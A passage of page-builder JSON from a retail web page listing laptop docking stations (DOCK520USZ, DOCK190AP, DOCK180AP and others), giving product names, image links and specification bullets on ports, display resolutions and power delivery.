the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp 